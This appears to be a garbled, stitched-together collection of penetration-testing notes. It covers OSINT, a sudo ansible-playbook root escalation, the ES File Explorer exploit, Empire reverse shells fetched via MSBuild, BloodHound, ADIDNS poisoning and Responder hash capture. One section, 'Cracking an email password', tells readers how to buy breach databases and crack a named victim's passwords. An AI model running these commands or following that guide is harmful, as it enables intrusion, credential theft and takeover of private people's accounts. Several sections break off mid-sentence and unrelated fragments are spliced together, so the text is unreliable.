Steinz Security

  MindMap for OSINT - DNS Enum - Domian/Subdomain - Check the Services/Applications Running - Organization Details - Organization users - Organization Job Profiles  - Google Dorks - Follow Google Hacking Database User Recon - Finding Emails - Check for the files on the website, download and exif all the files for info on the users. Use ExifTool, Strings - PowerMeta can be used to gather the data from a domain - hunter.io - Can be used to find email address available online, free for first few times - Awesome tool for finding Emails - Phonebook.cz - voilanorbert.com - Gives 50 Free emails - clearbit.com - Chrome Extension - check if the email is valid or not - Verifalia.com / verifyemailaddress.org - Find Users from Linkedn via BridgeKeeper python bridgekeeper.py -c website.com #can use the wordlist generator to create a set of wordlist "git clone https://github.com/captain-noob/username-list-generator.git" - Automated recon using SpiderFoot Gathering Breached Credential

  sudo dpkg --add-architecture i386 sudo apt-get update sudo apt-get install wine32 wine64 wine file.exe Installing Wine Mono #this might not work sometimes, so follow the below method sudo apt-get install mono-complete go to Wine-mono Index and download wine-mono.msi file sudo wine uninstaller hit on the install button on GUI and select the executable to install WineTricks sudo apt-get install winetricks winetricks dotnet45  

    Abusing ansible-playbook run.yml file #consider ansible-playbook is running as a cron jon /usr/bin/ansible-playbook /opt/backups/playbook/run.yml   Abusing (ALL) NOPASSWD: /usr/bin/ansible-playbook * Create a new get_root.yml file - hosts: localhost tasks: - name: test command: "chmod +s /bin/bash" udo ansible-playbook get_root.yml /bin/bash -p

    here we are looking for files whose names are in the form of 2020-01-01-upload.pdf below script was taken from github Python Script to Create and acess Filenames in the form of Date #!/usr/bin/python3 import requests import os url = 'http://10.10.10.10/documents/' for i in range ( 2020 , 2022 ): for j in range ( 1 , 13 ): for k in range ( 1 , 31 ):                               #File name date = f' { i } - { j :02 } - { k :02 } -upload.pdf' r = requests . get ( url + date ) #print (r.text) if ( r . status_code == 200 ): print ( date ) #text = r.text os . system ( 'mkdir pdf' ) os . system ( f'wget { url } { date } -O pdf/ { date } ' ) Using Exif to find the Author of the files #!/usr/bin/python3 from pwn import * io = process ( '/bin/sh' ) io . sendline ( 'ls -al pdf/' ) lst = io . recvrepeat ( 1 ). decode (). strip (). split ( ' \n ' ) files

    git clone https://github.com/yonjar/fixgz.git cd fizgz g++ fixgz.cpp -o fixgz ./fixgz /fixgz db.gz db_fixed.gz  

  If you want to change the user owning this file or directory (folder), you will have to use the command   chown . For instance, if you run sudo chown username: myfolder the user owning myfolder will be username. Then you can execute sudo chmod u+w myfolder to add the write permission to the username user. But if you want to add this user to the group associated with "myfolder", you can run sudo usermod -a -G groupname username and then execute sudo chmod g+w myfolder to add the write permission to the group.

Port Scan on Android as many random ports can be open on Android devices, its always better to scan all the ports using   https://github.com/RustScan/RustScan/releases download the debian package dpkg -i filename rustscan -a 10.10.10.247 now scan all the open ports with nmap -sC -sV to run default script and for version scan. Installing ADB sudo apt-get install android-tools-adb Abusing ES File Explorer Vuln Exploiting can be downloaded from here or can use curl to abuse it curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777 ADB Commands ADB Cheatsheet is here #Port forward a port from the Android device to ADB sudo ssh -p 22 -L 5555:127.0.0.1:5555 bhanu@steins.local #Connect to a device over wireless adb tcpip 9090 #connect to the service adb connect 127.0.0.1:5555 #list connected devices adb devices #get a shell from a selected device #adb -s device_name shell adb -s 127.

  In the log, it’s the last lines in /tmp/win kexsl_user.log: winMultiWindowXMsgProc - Fatal error 1 on xcb connection winClipboardIOErrorHandler! winClipboardProc - setjmp returned for IO Error Handler. (II) Server terminated successfully (0). Closing log file. here you can try to start Win-KeX with sudo: sudo kex --sl --wtstart -s A solution also brought the deletion of the logs under /tmp. sudo rm -f /tmp/*.log And stop the KeX server with the –stop and –kill option. sudo kex --stop sudo kex --kill After that, the start of kex as a normal user became possible. kex --sl --wtstart -s Also, a Win-KeX reinstallation can fix the error: sudo kex --stop sudo kex --kill sudo apt-get purge kali-win-kex sudo apt-get install kali-win-kex sudo apt-get install dbus-x11

    https://github.com/BC-SECURITY/Empire/releases #installing Empire apt-get install autoconf tar -xzfv empire.tar.gz cd setup && ./install cd ../ ./empire Reverse Shell to Empire Uselistener http (Empire: listeners/http) > set BindIP 10.10.10.10 (Empire: listeners/http) > set Name 10.10.10.10 (Empire: listeners/http) > set Port 8001 (Empire: listeners/http) > execute   Getting the shell back usestager windows/launcher_xml set Listener http set OutFile /root/a.xml #on the target machine run powershell curl http://10.10.10.12:8002/a.xml -outfile a.xml C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe c:\users\bhanu\a.xml Running Inveigh on Empire Agents Interact [ID] usemodule collection/inveigh (Empire: powershell/collection/inveigh) > set SMB Y (Empire: powershell/collection/inveigh) > set LLMNR Y (Empire: powershell/collection/inveigh) > set NBNS Y (Empire: powershell/collection/inveigh) > set Proxy Y (Empire: powershell/collection/inveig

    BloodHound-Python If you have access to DC, need admin creds - Github Linux: proxychains python3 bloodhound.py -d Steins.local -u admin -p p@$$W0rd! -c all -dc dc.steins.local -gc dc.steins.local -v -ns 10.10.10.10 --dns-tcp Few files will appear in the same location, import them into bloodhound Kali: apt-get install bloodhound sudo neo4j console go to localhost:7474 neo4j: neo4j #login in browser and change the password bloodhound #bloodhoun login will pop-up, login with new creds Windows: Download this on Windows target: SharpHound.ps1 powershell -ep bypass ..\SharpHound.ps1 invoke-Bloodhound -CollectionMethod All -Domain Steins.local -ZipfileName file.zip invoke-Bloodhound -CollectionMethod LoggedOn -Verbose or SharpHound.exe -c All -d Steins.local --zipfilename test.zip OR .\SharpHound.exe -d steins.local --domaincontroller 192.168.168.168 --ldapusername admin --ldappassword P@$$W0rd! --zipfilename domain.zip - c All open the file in bloodhound --> click on upload --&g

      Cracking an email password ## Step 1 The first thing you'll want to do is to go to https://haveibeenpwned.com/ and https://dehashed.com/ to find data breaches your victim is in. 9/10 times, they will be in at least one data breach if you're using an email address they use to sign up for accounts. ## Step 2 You're gonna want to go to https://rf.ws/databases and find the databases they're in, and unlock them (they're all 8 credits, you get 1-2 credits from posting on the forums). Prioritize ones with weak hashing algorithms or plaintext passwords. ## Step 3 Once you have your databases, download glogg (https://glogg.bonnefon.org/download.html) and use it to search for your victim's email address in your databases. 7/10 times, your victim will be in a breach that stores plaintext passwords, or in Collection #1-5/Antipublic data, though if you only manage to get password hashes, you can use hashcat (https://hashcat.net/hashcat/) to crack them. Cracking Machin

This method is helpful in installing Python-pip packages as the normally installed packages doesnt work on the alternative packages #View all python version installed update-alternatives --list python #Update Alternatives to a different version of python update-alternatives --install /usr/bin/python python /usr/bin/python2.7 1 update-alternatives --list python #Select the python version that you want to set as default update-alternatives --config python #View python version python --version Other Python-pip Issues curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py python3 get-pip.py --force-reinstall

Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/